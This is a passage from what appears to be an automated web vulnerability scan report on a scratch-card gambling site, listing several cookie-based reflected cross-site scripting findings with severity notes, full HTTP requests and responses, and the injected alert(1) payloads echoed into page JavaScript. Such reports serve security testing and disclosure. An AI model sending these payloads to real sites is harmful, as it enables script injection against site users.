Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: BO=FMf8e84"-alert(1)-"add043d468d; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:44 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf8e84"-alert(1)-"add043d468d";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.238. http://www.info.crazyscratch.com/ContactUsFax.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsFax.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0dfe"-alert(1)-"834b470a99f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PMb0dfe"-alert(1)-"834b470a99f; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb0dfe"-alert(1)-"834b470a99f; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:08 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb0dfe"-alert(1)-"834b470a99f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.239. http://www.info.crazyscratch.com/ContactUsMail.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c555"-alert(1)-"c0fe908b235 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM6c555"-alert(1)-"c0fe908b235; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: BO=FM6c555"-alert(1)-"c0fe908b235; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:22 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM6c555"-alert(1)-"c0fe908b235";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.240. http://www.info.crazyscratch.com/ContactUsMail.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 719df"-alert(1)-"1b7344d7528 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM719df"-alert(1)-"1b7344d7528; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM719df"-alert(1)-"1b7344d7528; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:43 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM719df"-alert(1)-"1b7344d7528";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.241. http://www.info.crazyscratch.com/ContactUsTel.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsTel.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5421a"-alert(1)-"1e275a84da5 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM5421a"-alert(1)-"1e275a84da5; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: BO=FM5421a"-alert(1)-"1e275a84da5; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:39 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM5421a"-alert(1)-"1e275a84da5";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.242. http://www.info.crazyscratch.com/ContactUsTel.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsTel.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a73f"-alert(1)-"d2ffb2ab02e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM9a73f"-alert(1)-"d2ffb2ab02e; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM9a73f"-alert(1)-"d2ffb2ab02e; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:00 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM9a73f"-alert(1)-"d2ffb2ab02e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.243. http://www.info.crazyscratch.com/FairPlay.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dafa7"-alert(1)-"6b80f265c94 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FMdafa7"-alert(1)-"6b80f265c94; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: BO=FMdafa7"-alert(1)-"6b80f265c94; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:52:02 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMdafa7"-alert(1)-"6b80f265c94";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.244. http://www.info.crazyscratch.com/FairPlay.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf00e"-alert(1)-"f876188d7e6 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PMbf00e"-alert(1)-"f876188d7e6; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbf00e"-alert(1)-"f876188d7e6; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:26 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbf00e"-alert(1)-"f876188d7e6";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.245. http://www.info.crazyscratch.com/Help.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89770"-alert(1)-"fc1c50ab615 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM89770"-alert(1)-"fc1c50ab615; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:51:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: BO=FM89770"-alert(1)-"fc1c50ab615; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:51:02 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM89770"-alert(1)-"fc1c50ab615";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.246. http://www.info.crazyscratch.com/Help.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1019c"-alert(1)-"e2075c7bc3b was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM1019c"-alert(1)-"e2075c7bc3b; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:50:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM1019c"-alert(1)-"e2075c7bc3b; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:50:26 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55561

